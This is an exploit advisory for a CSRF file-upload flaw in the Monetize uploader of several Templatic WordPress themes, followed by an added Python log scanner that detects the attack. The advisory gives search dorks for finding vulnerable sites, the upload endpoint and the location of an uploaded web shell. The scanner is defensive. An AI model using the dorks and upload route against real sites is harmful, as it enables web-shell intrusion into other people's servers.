#Title : WordPress Templatic Themes CSRF File Upload Vulnerability [Monetize Uploader]
#Author : mdhaxor
#Category : Web Applications
#Type : PHP
#Vendor : http://templatic.com/
#Download : http://templatic.com/wordpress-themes-store/
#Tested : Mozilla, Chrome, Opera -> Windows & Linux
#Vulnerability : CSRF
#DORK :
inurl:/wp-content/themes/Realestate/
inurl:/wp-content/themes/dailydeal/
inurl:/wp-content/themes/nightlife/
inurl:/wp-content/themes/5star/
inurl:/wp-content/themes/specialist/
CSRF File Upload Vulnerability
Exploit & POC : http://site-target/wp-content/themes/Realestate/Monetize/general/upload-file.php
File Access : http://site-target/wp-content/themes/Realestate/images/tmp/your_shell.php
Note : make sure the theme path in the CSRF script matches the dork you use
Thatz All....
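
Detection : added example, not part of the original advisory. It scans a web server access log for the two paths named above: POSTs to Monetize/general/upload-file.php (marked cross-site when the Referer is missing or from another host, as a CSRF-driven request would be) and requests for script files under images/tmp/. Assumptions: Combined Log Format; the function name scan, the host blog.example and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Combined Log Format: ip ident user [time] "METHOD path PROTO" status size "referer" ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)"')
# Paths from the advisory; the theme directory differs per install (Realestate, dailydeal, ...).
UPLOAD_RE = re.compile(
    r'^/wp-content/themes/[^/]+/Monetize/general/upload-file\.php', re.I)
# Only server-executable extensions: images in tmp/ are the uploader's normal output.
TMP_SCRIPT_RE = re.compile(
    r'^/wp-content/themes/[^/]+/images/tmp/[^/?]+\.(?:php\d?|phtml|phar)(?:$|[?/])', re.I)

def scan(lines, site_host):
    """Return (line_no, kind, client_ip, path) for each suspicious request."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not Combined Log Format, skip
        path = m['path']
        ref_host = urlsplit(m['referer']).hostname  # None for "-" or empty
        if m['method'] == 'POST' and UPLOAD_RE.match(path):
            # A POST whose Referer is absent or foreign did not start on this site.
            kind = 'upload' if ref_host == site_host else 'cross-site-upload'
            findings.append((n, kind, m['ip'], path))
        elif TMP_SCRIPT_RE.match(path):
            findings.append((n, 'tmp-script-request', m['ip'], path))
    return findings

# Constructed sample lines (documentation addresses and hostnames).
T = '[01/Jan/2024:10:00:00 +0000]'
SAMPLE = [
    f'203.0.113.7 - - {T} "POST /wp-content/themes/Realestate/Monetize/general/'
    f'upload-file.php HTTP/1.1" 200 31 "http://other.example/page.html" "Mozilla/5.0"',
    f'203.0.113.7 - - {T} "GET /wp-content/themes/Realestate/images/tmp/sample.php '
    f'HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    f'198.51.100.4 - - {T} "GET /wp-content/themes/Realestate/images/tmp/photo.jpg '
    f'HTTP/1.1" 200 20480 "http://blog.example/listing" "Mozilla/5.0"',
    f'198.51.100.4 - - {T} "POST /wp-content/themes/dailydeal/Monetize/general/'
    f'upload-file.php HTTP/1.1" 200 31 "http://blog.example/wp-admin/" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for finding in scan(SAMPLE, 'blog.example'):
        print(finding)
```

A same-site "upload" hit is expected traffic from the theme's own forms; a "cross-site-upload" followed by a "tmp-script-request" is the pattern to triage first.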